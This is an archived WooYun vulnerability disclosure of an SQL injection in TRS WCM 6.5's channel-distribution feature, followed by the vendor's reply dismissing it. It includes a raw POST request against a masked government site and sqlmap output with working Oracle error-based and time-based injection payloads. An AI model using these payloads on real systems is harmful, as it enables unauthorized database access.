乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-22: 细节已通知厂商并且等待厂商处理中 2014-04-23: 厂商已经主动忽略漏洞,细节向公众公开
测试版本:WCM6.5,问题出在后台“新建栏目分发”直接看图:
select WCMDocument.DocId from WCMCHNLDOC,WCMDocument where WCMDocument.DocId=WCMChnlDoc.DocId and WCMChnlDoc.CHNLID=? AND (注入点) AND ( WCMChnlDoc.DOCSTATUS>0 and WCMChnlDoc.Modal>0 and WCMChnlDoc.DocChannel>0) order by WCMChnlDoc.DOCORDERPRI desc, WCMChnlDoc.DocOrder descParam#1:0
POST http://马赛克.gov.cn/wcm/center.do HTTP/1.1Host: 马赛克.gov.cnConnection: keep-aliveContent-Length: 183Origin: http://马赛克.gov.cnX-Requested-With: XMLHttpRequestUser-Agent: 马赛克Content-type: multipart/form-dataAccept: */*DNT: 1Referer: http://马赛克.gov.cn/wcm/app/channelsyn/docsyn_dis_add_edit.jsp?isChannel=true&href=http%3A%2F%2F马赛克.gov.cn%2Fwcm%2Fapp%2Fchannelsyn%2Fchannelsyn_list.html%3FtabUrl%3D%252Fwcm%252Fapp%252Flogo%252Flogo_list.jsp%26tabType%3Dlogo%26ChannelId%3D4754%26SiteType%3D0%26IsVirtual%3D%26ChannelType%3D0%26RightValue%3D111111111111111111111111111111111111111111111111111111111111111%26&OrderBy=&RecordNum=0&ObjectId=0&ChannelId=4754&_fromfp_=1Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=5154EE38E4E8CDBA76F8699F7A0D36CE; DOC_SOURCE_NAME=; LastVersion=10<post-data><method type="checkSQLValid">wcm6_channel</method><parameters><CHANNELID><![CDATA[4754]]></CHANNELID><QUERYBY><![CDATA[1=1) *注入点]]></QUERYBY></parameters></post-data>
root@kali:/tmp# sqlmap -r /tmp/test.txt --dbms=oracle --current-user --is-dba sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 12:57:48[12:57:48] [INFO] parsing HTTP request from '/tmp/test.txt'custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] [12:57:49] [INFO] testing connection to the target URL[12:57:49] [WARNING] missing 'boundary parameter' in 'Content-Type' header. Will try to reconstruct[12:57:49] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the testssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: <post-data><method type="checkSQLValid">wcm6_channel</method><parameters><CHANNELID><![CDATA[4754]]></CHANNELID><QUERYBY><![CDATA[1=1) AND 2628=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(117)||CHR(113)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (2628=2628) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(102)||CHR(101)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)-- kwkr]]></QUERYBY></parameters></post-data> Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: <post-data><method type="checkSQLValid">wcm6_channel</method><parameters><CHANNELID><![CDATA[4754]]></CHANNELID><QUERYBY><![CDATA[1=1) AND 1990=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(72)||CHR(82)||CHR(86),5)-- TIhS]]></QUERYBY></parameters></post-data>---[12:57:49] [INFO] the back-end DBMS is Oracle
危害等级:无影响厂商忽略
忽略时间:2014-04-23 09:29
感谢您的关注!编辑SQL语句实现某些功能是系统的正常业务需要,且只有合法登录用户可用,软件中已对已知可造成实质性侵入和数据破坏的语法、特殊字符等做了过滤和限制,评估认定暂不需要修复,如有更多发现,欢迎反馈,我们会有专人跟进处理,再次感谢!*** 安全无止境,我们一直在努力!***
暂无